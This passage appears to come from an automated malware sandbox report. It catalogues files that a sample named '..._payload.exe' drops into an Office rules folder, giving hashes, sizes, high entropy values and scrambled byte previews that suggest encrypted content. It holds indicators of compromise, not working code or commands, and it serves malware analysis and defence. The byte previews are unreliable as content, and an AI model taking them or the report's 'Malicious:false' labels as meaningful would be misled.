                                                                                                      Preview:<?xml..G..%T.)1fq;.m.#.,........r_4.&..}..0Eu@qD.y@..4kA..O................38.....;.X.-_G).. .}X..S.3b%<...~.O...n.y...|...P....Y_.w.......bbq3......o.).a)PX.....9....}D...]0:..k...=.R....!.....4.FVMs...Y....9.....DR.F..x.jr.....oQ@%.Hl:Ph?#2~0o5..D..,....".|.='.T4.^.g.z..N...... ..T{.2..7.H.O..|B.).~.K.D.b..!.as..i]..WS>.._...!.11.y...%Q...n.u0...s.W.DC.xA`.....#.. ...p.7.U..(.........a5..`./..,.....T....hW6.m..:..Y.t.....]._.,.@..9*..B.....Z.%..\.....s6..].._5.)..DD.y.N..V....+lDCk.2...y..ZL.]....|.fF.I..KT.j..#w:RP.M..%........<F.J.`v.....A....4[..6O.~.<.Y.T.T.:.G....>....^........qg..x%..;...G.>..{.......(F.-..QaN.%.D.wjvL.......*....6..S..![.;......K_].....):3..,#C.......I...<.[.r..$..`.c}C".R..}.N.fxz..u.V..|..LN.d.E.........k.....:. v.$....Q.)3...t`.KMb...l......f...K>...J..84.N.....(.1u..{.Nu..".....0..[f4...N......S..[.y..^..e/].]G.,...C..B:.4./.J.T./..X..y.t.,z..T.?I.9.....I.-..y...6......~..C..T.X.=a.h.XyL....N-r.q"E.Cq.......m..%

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702250v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1685
                                                                                                      Entropy (8bit):7.897582736405099
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ptSHy8k/ci6AcYEYGAUG6i8S4UEC0R3TQwD:DSHe5wYuAt4vVJ
                                                                                                      MD5:3D281CD14EFB7AA69CA9CE9967661D15
                                                                                                      SHA1:7DE7E6EE57BCD65E21ACCC99E94BD5473F7E39F6
                                                                                                      SHA-256:0D8286DA0A5A6D986B1595748E2909A9556BAAD0F8FA305E2DE0EC06212AACD2
                                                                                                      SHA-512:DF43181AF3D5BB259A58E47218B2AD78EA534F768ABCC419F23F9E90723354E1D99EAD5084A8FB8692232497E660E90488B6A4F2F48EE714E121DB1E20E928A6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.m...WX1..v.u..,.U=.n.W"$.r...L....Z.hB.....Xp(s;....J.|0!.<..U.3PIN.....c(Qx. ."M.......]N.LC.Xz.ci. B....7.)N......_.W.0..5...~A....=.. ......kV....Shdg.....n.....1.f....,k{G'..K.........X9...-....D.s....c)...Flv...(...r...~F.......?._:'>O.A..~.b......p...h..e$..4.3..m.n.^....<.Ln.P...k~\..1e.....!a...TT....%............(.Qp=p...S&._uIf8..`.S......4.6....4|.....4......~.oOV.~"Kn...~.!...gI......g1.Wb..e.....#...j.p.....M...g'.,.\......'.<.!..=.......%.h5`>..2..H../)D. .@...;...#.[4[N.X...!......9.]....auA...+.3.I.z?...Y$R.>.$*.&...+2..V.t.}G];...SbfJ.B...}n.V.J.C..Q..x..o......cq%e..ws...1..U#....8&../.-HU\.......X...>dU.Wh..-..|.I.-kE..=..|....1-#....m..7..OL..`..n.'=.....mZ...0...\3...(J.....Pi<......h...B....."...J4.]..+n...{C....(?..D.|'..F`..Y..`u.5..K)..j`#<<...u$..w..{.....6...+...Z3..3...x.L...D..nm.nt....5.x..........w......../i..i..@...+.x...J..............o.8W.4.A..6........}."z\..s9.......i.....[.mG.A&..A0.T....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702251v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1722
                                                                                                      Entropy (8bit):7.883670810850373
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lCeKOOlb2S98spIUlXfkyj+hToBW0zUKfgzRKnJ696EwD:keKOOlb2S98sHd+hTUMcggnJ5
                                                                                                      MD5:9D364214DB5C7A5FBF9B8F9B7E1EDF36
                                                                                                      SHA1:F182DD690EFE2EAE9C482F05E3EAD4BE1E252AEB
                                                                                                      SHA-256:33D1933C28A13C3CE9B58BF28EEC43C640B615D6C5085A6251A04824FAD127DF
                                                                                                      SHA-512:297BB96658430B928A70F192C4FA981310CDF26CA6B3D3247B0C9ED04E89D416EB36C7367377597280D09F7611677AD3BB61C2E69E506633353E46EB1770B913
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....._...Bq..'...j..<S........{.YR<^.7.^....~1........QK......3...!Z.X..|}..sZ..."H....].".....t....~.o.]Z..rxb.4.w.....i5.a.]...O....i.a\$<`h......^...O..c2B/=.Z.=j'.....k......f.^kz.I..z.M........,0.x*D.^..M;....94.$.*.U....o.)...9K{...Ed.,.M...Gb.\.Cg~.bL...N.Z.+.1`.51........qa.^.r........)7.....2......7..../L.......t..<.<.~*W...]..WT.h.U..ht.[...WAik...f9.w...S..$....%8.EA(..."-v^.r..._2....*..a.......a..S.FLL...G.......=..9.!.....q..7...*=...Y..LL..U.._.D.L9.[T9.lH{...2`..<...*.A......n...oo.W;...,.....]C.g...;.ZR.B.2H....C.g{>..,.z.....H..R..QhpI.l..M....E.M.<........a.q^. Y.....B.sb...#.G.......<9..Z....fLUU..6]R....y.n.[H..1%..t..|,.p.}|..o....XO%...p..)....y....9l..K.._EanK.c.(].=....w.rG...r!..O..),;..qM.xc.C...j..w.<_.0....2.JV.c..0....Z.yH...lz:..{T_.'5...7 ..T.F.M./.1{.F.hF.Q.7}"..9....#..DV..H...4..S.w..(..-.R....E..=.VOf....2...S......Z(.,...X!...,.j....=B.u.......:...+....Fl....fr.p...u...V......L..^...../

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702300v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.892248931011382
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:o95BWR2zmLeUuSYEY1owfojxvGIXTH6uJcK7rTUwD:OoE0ehvEYSpxvGIXTH609vt
                                                                                                      MD5:95A9C74FC8789D526280FF85140FF669
                                                                                                      SHA1:5FD98DC23DD9126D3C20DEA56680BDFFC3B45B28
                                                                                                      SHA-256:EC448171CF47AF1C86555146F24B01B0E9100C293724F7CC011FBC3F2B3F10B4
                                                                                                      SHA-512:7FFC01BC612FB167593F127EB61F10B3BAF5D509D1EC4AD3BF7DD21F62384E71290BA444F93C58DB8698E354530D6081F2FCFC94EBA391A04480B9499A0D045F
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.e.h..p.wR...K0~|......~l...b&.Wv.X..Z.b.......>9.......y}r'....N.P:..~f...H........8.l..SS...S#....(...._.....>. ..$.B.T...X.H...07k..%*........-........$.P.D(Kg.jG.;jor.. "..;...<.s..P.f......wH4...%....:ZN...1y..8...G..me.UMA.;....j..x..r...D......wX.4...l.p......;2[7.4L..rP,..dKYx....7..c.w.....)..B.v@.."...q..6<...-.y.7..(.8;a'..2.[.*ON<Ns.Q..M....P.^..1V....(....s..}8y.i.M..:i..2.(B.8....4..'.j.O..c.w..".=.d..P.)h. ....Q.'......{..iF-.L....,.C.w`.L..yB.&..3....i{..gp....?../.....%......jY>.Ua.f...Nf._..I@....]b...P..8Be..>=...h..FMs...P~h]...{.F.....W-0..;A..2...H....0...D*.......bz.o$.-M.LT..._R...,.u.fi.W.G.1.'bN{.0.P!e..b....X..=3..At...]..9.Y...@.-..C..2.:v.P.>np$..."j.H.._...qwg......1..@'.n7b.i...=nuB.^8)}AZ.5.8...H8....}.p.3O..A>.S.......f.>q).@..r.z~....H2....Z..A......p.<.m.x...w..l...YN;.6....l.,5.......(T>."..... ..;....] Z..k...,._5D#4Q.:..+...q.Di66x6}=....,Y....p..Nu..*.o.$m<...1....`N.9...V..M..jC.mr..}.....z.`4

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702301v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.895605753594229
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1NIlLWakyGyA4gTLaVswYgvJO4VCc5CpXwD:sLTkj4gfalvhCO
                                                                                                      MD5:9D1C2A92CE5E76098D1EFBAC968B8D6E
                                                                                                      SHA1:83F08FF9AD56554BA7DAA83319E0C080E9917429
                                                                                                      SHA-256:D62687E79F3093420123C1B1818D475176111D88F8D9106C067A228013703C4D
                                                                                                      SHA-512:52CF0A4F7C8848168D549234C7B90E0AEF87A033D1D4CFA546DD782AC464F238B590384EE607E3BBFC6A148097B26A62BE2062AB62E3A085D1B4219C97166CB1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...I.^....P...j....{t.....E.Fx..a'6`.x).....;.....:K..|.%H/....q..C.2.{t....6V...d.....~..a)........t.. ..?w..F..... ....J.iG$*......V.Q..a...8...WR.8....yX..`B...M....=..,...s.U.u.....=.WD..Z....0'.;..b..+ .......k.&...G......G...OL..ff3.Y`....T$...GXR{..}'"N.U.|fK>..0..@ff.......J.J".=.:...NUD....fL9..k_kqo...Y..F0..4a...D..X.....%..J..Nk...:.5..0......7..l)....G*...[....1..\.B..f.S...^..!....#.P...:.....$.2Y........%..../qKI)KDg.@....H6Y.+...?.R~..m..hH_.o.S`.'.n..;.(.............-._.o-;@...."E+....G..r.F....<.J...Y.V.|...F.+..e..U.S.u...o..F.yC.J.,.4.....*.Eu..i..h.[.W....j&_...G....aV...N..K.....DSr.U86...5.."..vC.<.oX.>..Bc....R...@.\./.av....3.u.%.}..g?...2...`:.R`..s..^...l<.:...i....?..,..,...<...4W7..Q.F~.E...z.o.d/-..e.d.T..]..t.`\..7......Z\.&.%.}....:......RFu.}&.....#.M...}..TlW...W........ .r.V@......a...X.....50..t.+..O.........i..b.R..q...K0...Ca.i....l 3F."c7.6rj......3o.f....+W...u..b4.=...Q.2Aho...6

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702350v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1691
                                                                                                      Entropy (8bit):7.872283421032375
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:PkF9a++EwTTzWU9bALcABgJtV55KIK17jMCkxDyqYBeUe9bljbTqwD:M30Ec/WU9bA45YIKaC4L9blr
                                                                                                      MD5:2350FCE2ED0A4308C03D19247036869B
                                                                                                      SHA1:6B6330455AC51C431759896661BF516FBB9CD47C
                                                                                                      SHA-256:6432B849DF66B2EAD302D7707F4FCA82FC0E04D7000CA58192B19E51C793F702
                                                                                                      SHA-512:485B2FC0DEDDC4EB87C2176B568DACDD54C3213FA9D79175977557EC72B6139AEF2C532467DA7A2B6866225556F6C6585E4973F09728B49DAC09FE81AC6E1848
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..#vH.T...9T.=.wC..KWqT....r..r6.`..1f31..h...#.....r)......d.....[<........olD..<Q-.H..L....ai...(rw>.x. ..4.7..a.v.x..f.S...A......FWqE...tH..:..C!.r..Y..x ...............6.7J.zr....rO4.5... H'dW.Wy......OK........v1.....W..@.AR1.LX..w..aS...F..'.......X.....x=..z^...I..3qS.].1..~.q...%...3.....R.x.k..1l}S..=<s..W.Zh.v...`..l.....]T....s'.V7..V......Q)... ....&.Z.y1.U......W.5.,5...N...=.N.!....?>.#.....M.Z28]8..~..F...C.h....~....p..t .k+!.a.&....`b.*._.p..33.a....b.s.!+..@U...c..Y..,...$.tB"%...Y...'..T.......X+.F..L.|.#.C.1..F....U...j.....\.|..u.f...%...S........*...!HV...O.....~)(.......ex....%DLQ{._..B3?.m\$R_vs.LO.>.~;%.!Z)..`.xu.L..2\HR..a.g.3h.p..uh...2ap..tS..M....M.....z$g?.Gs..u..KY....i0.V..*..~..4?..W....&.y|E#...c.q..c.Y..-.e;..v.UTa.\.X.[.7.. .G..6:d\..l..(.M.....33q..S.....j..UM0...-.D...F%D..!...0.u.'..E,.....(............hs.H+.".. ...3..\.hIN ....m.a...D.[?....I......,.H.O......bC.0......h...z..|....Q.7........4

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702351v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1728
                                                                                                      Entropy (8bit):7.8844786369402975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:czdqhIGzLmelMDMqwqMjM4vhLD6Elt2R+R+ttwD:czTTelM4qwqMpD6ElsR+
                                                                                                      MD5:20A07D93D37F2D35B706FADEC932B8D9
                                                                                                      SHA1:D77A75CF35EDFF0B392CF2B4FBA4C1DCBED04E3C
                                                                                                      SHA-256:F15B52EB92381A0D0B5E77DB8FBCB3E51F46BD09E5EE2BE08AFB407806ED75CF
                                                                                                      SHA-512:3E97593AD0C4DF3FE16E48010DF42861B5D01E760B1D11DDEC425CE94E403A91C5122D8CD753A4E31741C21C6AEE737613886D39DD7FC34E749C00C1CC2CCC44
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..JD2.V.?..U.;......q..[.\.~'L..;..Q../F....5>.(.O...z7^..~...d%].8..@<..\...f.6O.W.v.A.R.@.'....E.....i....qH:.."|...v..-x...3..d.bv.>'......_{.[..........B..t..e~c....DwWt.N...6..4#\ .:.."..B.@.K...+:.h%........w...x.w.......$.:h....O.3w..(..r.....4b.c....G..i.Z.N.%.^x,J..A!.CD.Q6...Up.:e.Ph.C.-y7..2......~.S.C.E._...M..A\XB?....ye..i.;.N.X..7d....b{... .0/.`.......:!..{.b..e$........P..R..*G.(...>.....D...5.....Gf.......)@$..v.P..^,...:...1...Zr....R..TB....CD..\..q.e..l......&........yV..#=.-.l.Gj.e]_......<J(....A.j^....T}....-..l...........tt.K........R.L...-..nO<v.e(.....a.9........;..X..1.x...*.in..(.X..6......%3..P.G..!i..<.m....@..QM;.u.p6|S.....wR..=X.o>.}.......B....j....+z.`.JU<*S...@n.^.^AN......&=........E%{..@0...1Ki........83..r.3Z#.C!.A..5.d..J..I0..@..x.77..6.u.(....v...G]2...".4J..NG=~.N......F.y.........#.G.n.........}{....l.x......."..$.H.,.z(=..... ..d}...VOoc.X...(.@?Wd.5.Y....%S..|.c4T.u......Q...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702400v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1701
                                                                                                      Entropy (8bit):7.884621874155417
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ybqFfyiDb0yHkECR3Pq/qXJgmyMIMr1hC5snvZEnKJeyvj+ED9ypQpr0v6bD:ybGpMyHkEGymyMvLCy006EQpQJ0wD
                                                                                                      MD5:C50F3DBF02DC0C0C3B5A90CDDB688C05
                                                                                                      SHA1:9F42AE98E531BBA1A66C38F9B5B2C0954B44256D
                                                                                                      SHA-256:2CE98C9B1D2FA8D162ED914E479304D21A18F9AF28F15AA1244E6940399AB09D
                                                                                                      SHA-512:6156BDF0ED9BDCC61CB829BF572A2F6A424EB6B30493B98B8E99A015F692314BDB8B88730D77A71BDA05DE762C5E741A4E76D1FAEDA125BDC5CFB8D35AFF5D31
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..4..........B..O....9. .0O....cT..i@...B.z..(\S*J..-y...2l.Gt..34..62......gs..f...s.w{..t..fG.k.Ybu{U.<...m...K....=.^..&.n.b.9.....M.r..C~?)R.8S.YuU...R.........L.<\MJ.4N.W.37l,..>......\.~u.....O.y/..VC...N2@q.+.>..Fl.....|.k|9..aq.2..;....6...............M...._...s.Um...l.Z..n.....nC6y.q .h,I?]....D..U..-..q.qd.*7.......'s...&*.>......#.&.$..0.=...K(..>.z!...~...^.|.M./..hQ....L....pz)gC.....y........c.....!........G$.....z.k...X...5e.)P.B...x.T..T.E.+(......<....v..O-..A2...X...&.I.,.&J.DeG..)54..>..z.|{...=|Idx....!.d.x]>_....pCs...x]=N.....q.W.f.!..J:..!...g.;.DaI.-.o.?X<.o..o.!x...R5....|.o..a.tu!~.`..-...aV4....(...n...B5..w.$<S....A.8....x]u...@.j..=.1....1~..;..M../.h$...$..wfG^..Zq....4+{.K..y.)!...`.6_...*..K!..xM.HH...7....-....8...e.5.5.{Z.i..N\].C......Yvtv$I. .....*ONz..t6~.U.L~|O..i@gE .N. ."..K.i..........NM.l..f..8....&y...........w.m..~.b.../..BTO.<b.\.../Q,mG.0Z...P.5........K.w<x..kU.....P.?.@...g.2........R....cd.,.A.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702401v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.899395501355304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ZIjjtxzq39lLKZbynxZ1zrOudLq3MnadCv0ZwD:yvm39wZEnz6udLUY0K
                                                                                                      MD5:D5D01E2F4B015CFAF4590EF4B93E1F90
                                                                                                      SHA1:B8D17BBFD2EB06ABD0ADF619289EC112A27146F6
                                                                                                      SHA-256:1CEDC79D2E8D848635A635C895C10D40D600C2331BBC80D4C9E9D70A5788DDCC
                                                                                                      SHA-512:D6FA9DC02C2278EAC275DF4FC24FDE3B498B4674EBE99F4259BB3C6D5C4CC2663127D5BE57BCDD8C66DC520E62E5F8D82826B4C3C30E85BF3B0B9CEDF0E27E4B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlc."l&1.#...$W(..z..Ho..........jT.R.kc....[..w...'..G.*.a..E*Lp.....9;3=2J.(..t..l......2r.k.}.....mc..9.........(..q...}.?...f..]....#.q?.8h....5....C.ls.<s1M<.f....l...q.Q....g.....n.a)...Dr`..../.KO.....].'.G.....+..-...@.....y..Y}..,.Q.....K.{h.Gl.1v...\.%:......z'j.A....).}.M8..d.=_......:... *V...'......a..Q.A.j..k....t."..&..8Z..G|...Uv.....I...9J.X.q7..R>...zd@..&lB.;...#......,p.J..-`.[/.1E...QI.....]......ZH.<.."Z...b.B.f..OAPM...R...E$.L..+..4...}.m...3....z.;.ar_.".z:;G..=>.B..Z..;is2UVz.c.V.;H..x..][.\.:s.H.O...VNk.kt.......\...'..vj%y/.nC.....or".y./...Ev.r...).I.....$.......M..uY.sQ....9.....|....mT...R[.....$E.0..O.[N5(.(.9.y.o"~A.X.!.%....h@.HC...F.&k....:.R....0.-t.....W..7.x.........&...Q..~..S....^.m..p.yr/>._.+i........ ..M+.6...../..<...;...o....L...C..q..+.`.")Sf.^...%.....5......e...C...ib)~J.{..`4..n"...&.....U......h.bf........$hj..*..#^........w7.....ER,F0.k.R.ED.E.Cg...)....v........-......)..MO.....W

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702450v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1693
                                                                                                      Entropy (8bit):7.877350922218929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:jKrstYnt026/ZW1qWLMlgPoKbuyhWBr3eNNt83XYIXPQ5HwD:jrtYnt7u0qWL5/S3oX5M
                                                                                                      MD5:C747DA5F1F40307B9385BE1D47504A1E
                                                                                                      SHA1:8996CD27D5A29139AB6BA3DBFB527822292375CF
                                                                                                      SHA-256:CB0A10FF5F8C5665C17CA69FD54C571328A0ED1D5886341D61975FDC4D8653BF
                                                                                                      SHA-512:BA950D0A77697A0304E8566D86614E2ECE3255E2D8432A18CB765A4709B3C79D2177AA1A08F132A84D02B3BF69A5AD32285176C8F062CEB771C7BFB43DEA9E89
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.a..aY.9DN"a!..T7..=/n.#.[.JYX;..q.i..#xgDg...dW`..<no...Z..X....P.4..5...t....%.~_......G....x........O0.r%...I......T..A.j...9..FC..T.....f9.......[]..b...k........P.A.xk....%.9%... .Q.../c.....d.............(...!.\Mj..?j...-q..k./3...UN.....D..CC..;..+.I..F..).jB.<.W..^.j..p.z..BM.g.b.Gi......Q.........*S/.|.....&..TU..b{..Q...c"..;C...8`..r..XPK.0..../6x..|G.....?}.h3....1jq.|r....ig..{.k.s..9.-....Z;...v.?......p^.=...&.d!.g.N6k.......=.l\P...T.61c..'.....Q-G....k/_.. ....2.....,.9...).:.m.Sc.B8^.......MSW..+.J.W.`.l..e..{..U!.C...]g..<h..5..l....._......._.....(-%..<co.7.... .Z....R?T.r..c`...1J...E....>..8...J.%..c..Mb...7.]).`#...Bs.+Og.gOP...~...A."..r.f.......hS...e...u.s.i..Y.+..?.-..S...|I.,..X..O.1.F!....Wmd*..7.#.L..X%.V.....k..mv..o....1.4CC.zD...G.vS..~.......A*.oj.S...}F3..K.\....3.W...i.>....%R.N.%h.Z.....>Z.6x......gO.N......V.p.z..{X..?wC.'&...Z...t..Y.S..H..c.}...o{.r......OTtK<...|.........?.7~.x....>BX.=.N..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702451v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1730
                                                                                                      Entropy (8bit):7.89338584202585
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2BXvobRg2HTf56Fvqg8oUvW9yhlAqauDKcst6fiPnbcB6JqvEpXfVPmEf3SidkQg:cXyNzf0FygivebqHK53nbcNveSywD
                                                                                                      MD5:072F3FFA43C8D0180A5464578E63773B
                                                                                                      SHA1:84DDA512E6F469818423DE9C1EC3228AAF4E1D07
                                                                                                      SHA-256:E865C29D5375990CA6E0A89128EF592D29CFF290B958208DB01620480E3BFB7F
                                                                                                      SHA-512:DC5F2B29499B77C19B32B4C0C0F94ADBDBC7F9703893AB2B66E679C0B48E8A278643B64C975BC763568D10E909966EE148FC9F8EBF564884028F9C00E2BA8FCB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.'.'.........R->q.4w~z.6..>...;hc..3.I..Y/.<...~.Jz|N.._....+.1u..[.........t..A..O.n.......$.^#...[..y..J...y....4........t{sK~%..9;.v..`...U.lB..=.F.....jL.[Tf.O......Ie.r.v.|....Kp.k ..q!k.3'.Gy.....k~Bc./&.F..V.V..7.IvL.7......,n....83..2.r.B..R....r...=N.|.o...p.'e..v2.]X|..F.Q....G.S../gr..n..~.7......R"......]Z....;..L...sh"...1...`YW%..A..I...u..........g..v.../.G...@.)^.....d.`..sN.....(.Q.5.=p.....[.o.c..A!.j........m..........so"...K..L!..!S..F.;..a....Q..... Q......E..B......f..+.V......9|w.a.......`..>..K..I...$K<....z&..*..q4~vS...a.H......J...hZw.l.....5{=M.lR........l.F.dfM....P,..E#....]..]../i.R.<.....A..`..%.h.@/V[d....1^.Wy....6p.......7.JT...%..^....[zK..S.e...<...........J.........rE...ps..CZ.........s..K=.e.`O..D.'..x.ZcVc..c......h...m....%f..{..tn..}-<.L..R...f..J....>..}E.....y:zs.|..S.Xq..x....f..K.S...F.h.T...i.t.p.uq-..5...]....+.L.-b...1x.s..I......uon...{%.1...?.$..(Zl.w..'.........!......~......V~..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702500v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1711
                                                                                                      Entropy (8bit):7.887162226455884
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:xl8tV/4jAg43NNL3fvXV09+VMTpxVbsUXfJupwD:xl8tp44X3ffVHVubsUxua
                                                                                                      MD5:E51B1D02B26412F2E73D2F0BD1AF68E1
                                                                                                      SHA1:BE3BECFD1BAC803B97B5BB291829C350F0095371
                                                                                                      SHA-256:BD82EE6AA19F34D2816EB909337E50D1E9324DB1F44EA9E9B53C8D6D90E7001F
                                                                                                      SHA-512:CB0B2D1FD7B291B60397154563C0D765D91276FD5851C2A6F19A9B2665F993CA9E4AD1000EC1079F797FA1C2A9C159DE763AE2B99E0CD106718C419B42D52D32
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.. k&.j.... .G.l..."-.O....)d1.NtcHt...Y.)Q`..P.i....w.DHB.S........!.H.6..mJ.1..z.U1.'...D.|.>...3....w..u.*<.``...7..x.*.|.....0...b.(.M....z.t.....58..Y..O.N..*.?.zUL..i0..l...`.......tO[...;././....E.sN.......'.(.4..6E.H....Z8......-.....=...bt..A.t.9.:2.].ew..H7....[...]..E.t....BcDC.....m4 Z.p.3...TS_.....>..\.....Nh...P.e.._..8"......,.h......-.....=}..B...L.....Oj..X.6..{R....u....~}.?...1.............<0....O..k....T......7.1....u}k...P.I.......A..L....xs.J.A>..|.R...e....\v....SD(..c.;..J..w...]..~.Ol....K...R._5.......,.....l..z.Zno.,K...v.4...4x....p.-.0./.9.?K~j...%.........`.}\..%... ......&....).y..$........d.$9.B.$.....H ...v|.;...Wwa.P\%7..#6...e..1..uP,2.7~...... ...0.-..j.Z"P.....t...8.......p.bBtFX..w.b..R7YXV.$.....:....V......n......pr..G.X>.j{....K..9......[.Ywj....M.O..'.9.7.....A;.k....k.es...1..?u...X(.X.T.....=i8|K...5.J...o.I.K...<gK.0|2:.wE=....s...]k...?=..L5+......T.2.'..W.U..5..0f

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702501v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1748
                                                                                                      Entropy (8bit):7.877670926362866
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:iDWET2NNXpYvuOZZoKt6cARAajZ5ZLjcWI9/wD:gWlzOLtQRAa/ZLjcWkU
                                                                                                      MD5:88FCCB83C005BB0DFEADFD1AB198D7DA
                                                                                                      SHA1:297DE9C69395C25E82408A6DB61527A48B0A6539
                                                                                                      SHA-256:5924D93A6120EB903A4FA1D112E919202481CC774F4A7386D46205DFB318B758
                                                                                                      SHA-512:8AD72BBFA02F7F709008FD48D0CC876BAF864E3A2D6F43348A8C9766FB56359EE29EF688C47EDCCDD2E4C28B7C75642717B653B2896A9688BF21FA2DE4572142
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml7....[..8...^.....:..0;)<....a:.h.a5......-,1.......y....j6*...1...eW.x....q<...~M.3......N.>$. .....4.."..8..E\.#.I.h..{..2.XBM....."z.h.....J\..'f.J..I..~...Qq.....T[.L,.;...d.._"M~..).T...*.._f.A.o..)zN..U]l.._.0 .b.d....o...d.Y.)5>CdY"e..h...u3..."W8^..kX...9.2..5.;....;.2.{..........C:.WL..3..8...Y..)...A..1.J.a$`.....Pp....ZT)..j.>.hgU.0...F&...d..H.i)...1...~...86...f|.....U..Q.\.....a..3.T..W.)WR...\...e=...~,.,..P......h..3..=.s&}..B... .P.9.X..T.......gkGC.....h...LX{..X..*..*...o)o..x.<.......l....2$.s .....8x....F.q.S.p....?......q...;.....sJ...aE..XBG...=..s1.d#.`.aKH!k]l.[}.....~z.)C...C|=.H#P.F.'t=..C]...h.&.t...L.:.\^ U..../5..T...\..!g......Sb#......!...=...._.<O...c...(.q.@.....t..z..9.J..bo.9....%....j...`..{..4...+.$.L.{R...S.....;.`..0k.3)....X<c..Ug...ao.4f..0`......CA.....w\w....oiHF8.q9t.&.G.3z_.w4.iG...j4.j.WlT.t;..)2..rE..P...X...Q...2)a..)....(....g.z.a.....~.M`..f...s.....$<..x.tx..._...d........q.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule702550v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
